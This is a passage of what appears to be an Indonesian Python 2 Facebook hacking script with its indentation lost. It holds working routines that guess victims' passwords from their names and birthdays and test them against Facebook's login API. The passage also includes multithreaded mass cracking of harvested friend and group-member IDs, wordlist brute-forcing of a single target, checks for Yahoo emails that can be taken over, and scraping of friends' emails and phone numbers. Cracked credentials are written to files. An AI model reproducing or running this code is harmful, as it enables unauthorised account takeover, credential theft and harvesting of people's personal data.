try:
id=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
r=requests.get('https://graph.facebook.com/' +
id + '?access_token=' + toket)
a=json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mCheck \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mUnlock security \x1b[1;97m...')
time.sleep(2)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease Wait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1=a['first_name'] + '123'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y=json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFound.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2=a['first_name'] + '12345'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y=json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3=a['last_name'] + '123'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y=json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir=a['birthday']
pz4=lahir.replace('/', '')
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y=json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist=raw_input(
'\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw=raw_input(
'\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file=open(idlist, 'r')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
for x in range(40):
zedd=threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka=open(idlist, 'r')
up=buka.read().split()
while file:
username=file.readline().strip()
url='https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
username + '&locale=en_US&password=' + passw +
'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data=urllib.urlopen(url)
mpsh=json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa=open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append(
'\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek=open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append(
'\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(
len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Back'
print
select_super()
def select_super():
peak=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
select_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
z=json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r=requests.get(
'https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw=json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re=requests.get('https://graph.facebook.com/' + idg +
'/members?fields=name,id&limit=999999999&access_token=' + toket)
s=json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mThere is nothing'
select_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
titik=['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user=arg
try:
a=requests.get('https://graph.facebook.com/' +
user + '/?access_token=' + toket)
b=json.loads(a.text)
pass1=b['first_name'] + '123'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q=json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2=b['first_name'] + '12345'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q=json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3=b['last_name'] + '123'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q=json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir=b['birthday']
pass4=lahir.replace('/', '')
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q=json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p=ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw=raw_input(
'\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total=open(passw, 'r')
total=total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
sandi=open(passw, 'r')
for pw in sandi:
try:
pw=pw.replace('\n', '')
sys.stdout.write(
'\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh=json.loads(data.text)
if 'access_token' in mpsh:
dapat=open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks=open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why=raw_input(
'\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong select \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong select \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Back'
print
yahoo_select()
def yahoo_select():
go=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_select()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mThere is nothing'
yahoo_select()
def yahoofriends():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh=[]
jml=0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
teman=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
kimak=json.loads(teman.text)
save=open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id=w['id']
nama=w['name']
links=requests.get('https://graph.facebook.com/' +
id + '?access_token=' + toket)
z=json.loads(links.text)
try:
mail=z['email']
yahoo=re.compile('@.*')
otw=yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open(
'https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html=True
br.select_form(nr=0)
br['username']=mail
klik=br.submit().read()
jok=re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek=jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files=raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total=open(files, 'r')
mail=total.readlines()
except IOError:
print '\x1b[1;91m[!] File There is nothing'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh=[]
jml=0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
save=open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail=open(files, 'r').readlines()
for pw in mail:
mail=pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo=re.compile('@.*')
otw=yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open(
'https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html=True
br.select_form(nr=0)
br['username']=mail
klik=br.submit().read()
jok=re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek=jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Back'
print
grab_select()
def grab_select():
cuih=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Jangan kosong'
grab_select()
else:
if cuih == '1':
id_teman()
else:
if cuih == '2':
idfrom_teman()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_teman()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_teman()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mThere is nothing'
grab_select()
def id_teman():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
z=json.loads(r.text)
save_id=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz=open(save_id, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt=raw_input(
'\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok=requests.get('https://graph.facebook.com/' +
idt + '?access_token=' + toket)
op=json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r=requests.get('https://graph.facebook.com/' + idt +
'?fields=friends.limit(5000)&access_token=' + toket)
z=json.loads(r.text)
save_idt=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz=open(save_idt, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
